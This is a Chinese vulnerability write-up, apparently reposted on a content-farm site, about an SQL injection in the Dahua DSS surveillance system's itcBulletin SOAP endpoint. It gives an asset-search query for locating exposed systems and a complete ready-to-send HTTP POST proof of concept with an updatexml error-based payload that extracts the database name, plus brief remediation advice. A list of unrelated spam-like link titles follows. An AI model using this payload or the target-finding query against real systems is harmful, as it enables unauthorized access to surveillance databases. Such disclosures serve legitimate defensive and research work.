当前位置: 首页 > news >正文

设计网站账号网页设计期末作品要求

news 2025/9/17 8:24:05
设计网站账号,网页设计期末作品要求,网站移动排名,wordpress扫描工具漏洞简介 大华DSS数字监控系统itcBulletin接口对传入的数据没有预编译和充足的校验,导致该接口存在SQL注入漏洞,可通过注入漏洞获取数据库敏感信息。 资产测绘 app“dahua-DSS” 漏洞复现 POC: POST /portal/services/itcBulletin?wsdl HTTP/1.1 H…

漏洞简介

大华DSS数字监控系统itcBulletin接口对传入的数据没有预编译和充足的校验,导致该接口存在SQL注入漏洞,可通过注入漏洞获取数据库敏感信息。

资产测绘

app=“dahua-DSS”

在这里插入图片描述

漏洞复现

POC:

POST /portal/services/itcBulletin?wsdl HTTP/1.1
Host:your_ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Connection: close
Content-Length: 341
Accept-Encoding: gzip<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'><s11:Body><ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'><netMarkings>(updatexml(1,concat(0x7e,(select database()),0x7e),1))) and (1=1</netMarkings></ns1:deleteBulletin></s11:Body>
</s11:Envelope>

在这里插入图片描述

成功查询出当前数据库。

Sqlmap验证

在这里插入图片描述

修复建议

1.升级至应用最新版本
2.部署WAF防火墙进行防护。

http://www.yayakq.cn/news/529911/

相关文章:

  • 哈尔滨网站建设代理商网红营销的概念
  • 做任务的正规网站给个网站免费的
  • 易云巢做营销型网站wordpress手机分享图片
  • 哪个网站专门做高清壁纸就业创业网站建设
  • 免费注册自己的网站本地营销策划公司
  • 泉州网站建设方案维护陕西省私募基金协会
  • 又一个 wordpress 站点如何选择wordpress主机
  • 哪里找做网站的客户wordpress百度移动落地页
  • 多语言网站实现怎么查询网站的备案号
  • 做购物网站 营业范围是什么对软件工程专业的认识
  • 多少钱可以做网站溧水区住房城乡建设局网站
  • 现在网站优化怎么做个人定制网站怎么做
  • 做网站基本东西自己如何做微信小程序
  • 全栈网站开发网站网络营销推广商城
  • 哪些外贸网站可以做soho中山vi设计公司
  • seo网站优化外包网站建设 课程
  • 做坏事网站深圳设计院有哪些
  • 汇邦团建网站谁做的做gif表情包网站
  • 中山网站建设平台为什么不要做外包员工
  • 绿色在线网站模板下载建设做网站
  • 网站ftp密码健身器材网站源码
  • 工程项目保定seo全网营销
  • 成都网站建设公司思乐科技关键词上首页的有效方法
  • 大型门户网站建设是什么网站建设的业务员
  • 世界杯视频直播网站推荐如何用dedecms做网站
  • 网站建设成本核算学校网站栏目建设
  • 海安网站设计手机应用商店app
  • 专业手机建站公司长沙营销网站建设公司
  • 网站可以给pdf做笔记丰台网站开发公司
  • 旅游公司网站开发html5电影网站设计论文